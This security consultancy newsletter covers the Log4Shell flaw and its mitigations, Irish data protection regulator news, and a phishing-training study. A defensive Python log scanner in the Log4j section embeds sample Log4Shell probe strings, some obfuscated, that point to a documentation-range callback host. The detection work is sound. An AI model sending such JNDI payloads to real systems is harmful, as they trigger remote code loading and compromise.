Curated advice, guidance, learning and trends in cybersecurity and privacy, as chosen by our consultants.
Not the Yule log you were hoping for
As 2021 drew to a close, there was no easy end to the year for security professionals. The Log4j flaw (also known as Log4Shell, CVE-2021-44228) emerged in mid-December and was quickly dubbed “the most significant vulnerability in the last decade”. It affects widely used open source code, Apache’s Log4j logging library, which is embedded in hundreds of millions of devices. That reach gave it the potential to enable “potentially devastating” attacks including system compromise, data theft, or ransomware infections. Organisations and security teams scrambled to patch the flaw as threat actors were reportedly “actively scanning networks” for it. Cisco and Cloudflare found that some attacks started even before the flaw became public knowledge.
Cygenta’s excellent, detailed post explains in simple English what the flaw is and why its reach is so extensive. In the meantime, BH Consulting has been advising clients to check how they might be affected by taking these steps.
– Scan any internet-facing devices/systems to detect if they are vulnerable
– Check this helpful list of vulnerable systems/services to determine if there are any vulnerable products in use within your environment. (It also explains how the relevant vendors propose to manage the vulnerability.)
– Contact your vendors, including cloud service providers, to determine if they are vulnerable to the issue and what steps they are taking to mitigate it
– If patches are available, apply them urgently (making sure to follow vendor guidance on applying those patches)
– Log4j 2.10 to 2.14.1 let you mitigate the risk by setting the system property “log4j2.formatMsgNoLookups” to “true” (or the environment variable LOG4J_FORMAT_MSG_NO_LOOKUPS to “true”). Note that Apache has since withdrawn this as a complete mitigation because it does not cover every configuration (CVE-2021-45046); the more dependable interim fix for any 2.x release is removing the JndiLookup class (org/apache/logging/log4j/core/lookup/JndiLookup.class) from the log4j-core jar, followed by an upgrade to a fixed release as soon as possible
– Where possible, implement a Web Application Firewall in front of any vulnerable internet-facing systems/services to protect those assets until the vendor provides a patch
– Monitor logs and firewalls for the indicators of compromise.
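To illustrate the last step, here is an added example (not from the original newsletter, and not BH Consulting’s or Cygenta’s code) of detection logic run over web-server access logs. A plain string match on “${jndi:” misses the obfuscated probes seen in the wild, so the script first collapses the nested Log4j lookups attackers use to hide the word (the lower/upper lookups and the “:-” default-value syntax), then flags the resulting JNDI lookup and extracts its scheme and callback host. The log lines are constructed for this example, and the 203.0.113.0/24 addresses are a documentation range, not a real attacker.

```python
import re

# Constructed sample access-log lines for this example (203.0.113.0/24 is a
# documentation range). Lines 2-5 carry Log4Shell probes in the User-Agent or
# Referer field; lines 3-5 use common obfuscation tricks.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Dec/2021:21:13:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Dec/2021:21:14:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:21:14:12 +0000] "GET /login HTTP/1.1" 200 512 "-" "${${lower:j}ndi:${lower:l}${lower:d}a${lower:p}://203.0.113.10:1389/a}"',
    '10.0.0.9 - - [10/Dec/2021:21:14:13 +0000] "GET /api HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://203.0.113.10:1099/b}"',
    '10.0.0.9 - - [10/Dec/2021:21:14:14 +0000] "GET /api HTTP/1.1" 200 512 "${${env:NOPE:-j}ndi:dns://203.0.113.10/c}" "curl/7.79"',
]

# An innermost ${...} lookup: its body contains no further braces.
LOOKUP = re.compile(r'\$\{([^{}]*)\}')

# After normalisation: a JNDI lookup, capturing the scheme and target host[:port].
# Log4j treats the lookup prefix case-insensitively, so the match does too.
JNDI = re.compile(r'\$\{\s*jndi\s*:\s*([a-z]+)\s*:(?://)?([^/}\s]*)', re.IGNORECASE)


def _resolve(m):
    """Evaluate one innermost lookup the way Log4j 2.x would, for the lookups
    attackers use to hide the string "jndi"; leave any other lookup intact."""
    body = m.group(1)
    key, sep, rest = body.partition(':')
    if sep and key.lower() == 'lower':
        return rest.lower()
    if sep and key.lower() == 'upper':
        return rest.upper()
    if ':-' in body:
        # ${prefix:name:-default} yields the default when name is undefined;
        # ${::-j} and ${env:NOPE:-j} therefore both evaluate to "j".
        return body.split(':-', 1)[1]
    return m.group(0)


def normalise(text, max_passes=32):
    """Collapse nested lookups, innermost first, until nothing more resolves."""
    for _ in range(max_passes):
        new = LOOKUP.sub(_resolve, text)
        if new == text:
            break
        text = new
    return text


def scan_line(line):
    """Return scheme, target and the de-obfuscated line for a JNDI probe, or None."""
    norm = normalise(line)
    m = JNDI.search(norm)
    if not m:
        return None
    return {'scheme': m.group(1).lower(), 'target': m.group(2), 'normalised': norm}


def scan_log(lines):
    """Scan an iterable of log lines; return one hit dict per flagged line."""
    hits = []
    for number, line in enumerate(lines, 1):
        hit = scan_line(line)
        if hit:
            hit['line'] = number
            hits.append(hit)
    return hits


if __name__ == '__main__':
    for hit in scan_log(SAMPLE_LOG):
        print(f"line {hit['line']}: {hit['scheme']} -> {hit['target']}")
```

Run against the sample, it flags lines 2 to 5 and reports the callback hosts, which are the addresses to block at the firewall and to hunt for in outbound LDAP (1389), RMI (1099) and DNS traffic. Two caveats: Log4j evaluates any string that reaches a logger, so a probe may arrive in a header your proxy never records, and further encoding tricks exist, so a clean scan is evidence of absence only for the fields you log.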
Because the library is embedded, often transitively, in so many products, discovering every affected component will take time, and the flaw will keep affecting the internet for some time to come.
Data protection: new guidance for processors and a new strategy for the agency
Busy times at the Data Protection Commission recently. The agency has published the final version of guidance on child-specific data protection measures, intended to enhance the level of protection for minors against data processing risks. The Children’s Fundamentals are already in effect and now form the basis for how the DPC will approach supervision, regulation and enforcement in this area. The DPC also unveiled changes to its breach notification form. Data controllers can find a summary of the form on the commission’s website.
The Commission’s newly published regulatory strategy 2022-2027 sets out a plan for “five crucial years in the evolution of data protection law, regulation and culture”. The regulator has also published a report on the public consultation process. A few weeks before, the Business Post broke the story [PAYWALL] that the agency had written to the Irish Government, asking for urgent reform and a “radical reassessment” of its structure. Its pre-Budget submission described the commission as “unfit for purpose” in its current form. The story is significant because the GDPR’s one-stop-shop mechanism means the DPC is effectively responsible for policing the privacy and data protection activities of the many social media and technology companies with their European headquarters in Ireland. Other European regulators have previously criticised the DPC for a perceived slowness in pursuing cases and unwillingness to levy fines for breaches of the GDPR. Privacy advocate Johnny Ryan said the Government now needs to set up a fully independent review of how to reform and strengthen the DPC.
Do phishing exercises net the right results?
Regular readers of this newsletter and our blog will know we’re big advocates for raising user awareness about security. Organisations’ own security education campaigns often go hand in hand with simulated phishing exercises designed to test people’s security awareness. Now, a new paper, Phishing in Organizations: Findings from a Large-Scale and Long-Term Study, has made some surprising discoveries. Over 15 months, researchers Daniele Lain, Kari Kostiainen and Srdjan Capkun studied more than 14,000 users with a partner company. The employees received different simulated phishing emails during their normal working day. The company’s email client had a reporting button added to allow participants to report suspicious emails. The researchers measured click rates on phishing emails, dangerous actions such as submitting credentials, and reports of suspicious emails.
Some of the findings go against conventional wisdom. The researchers noted: “Surprisingly, we find that embedded training during simulated phishing exercises, as commonly deployed in the industry today, does not make employees more resilient to phishing.” However, the paper also found that warnings on emails are effective, and that crowd-sourcing works. “Using employees as a collective phishing detection mechanism is practical in large organisations,” it said. Plenty of food for thought in the full paper, which is free to download.
Have you signed up to our monthly newsletter? Every month we send out the latest cybersecurity and data protection news, trends and advice from around the globe. Sign up here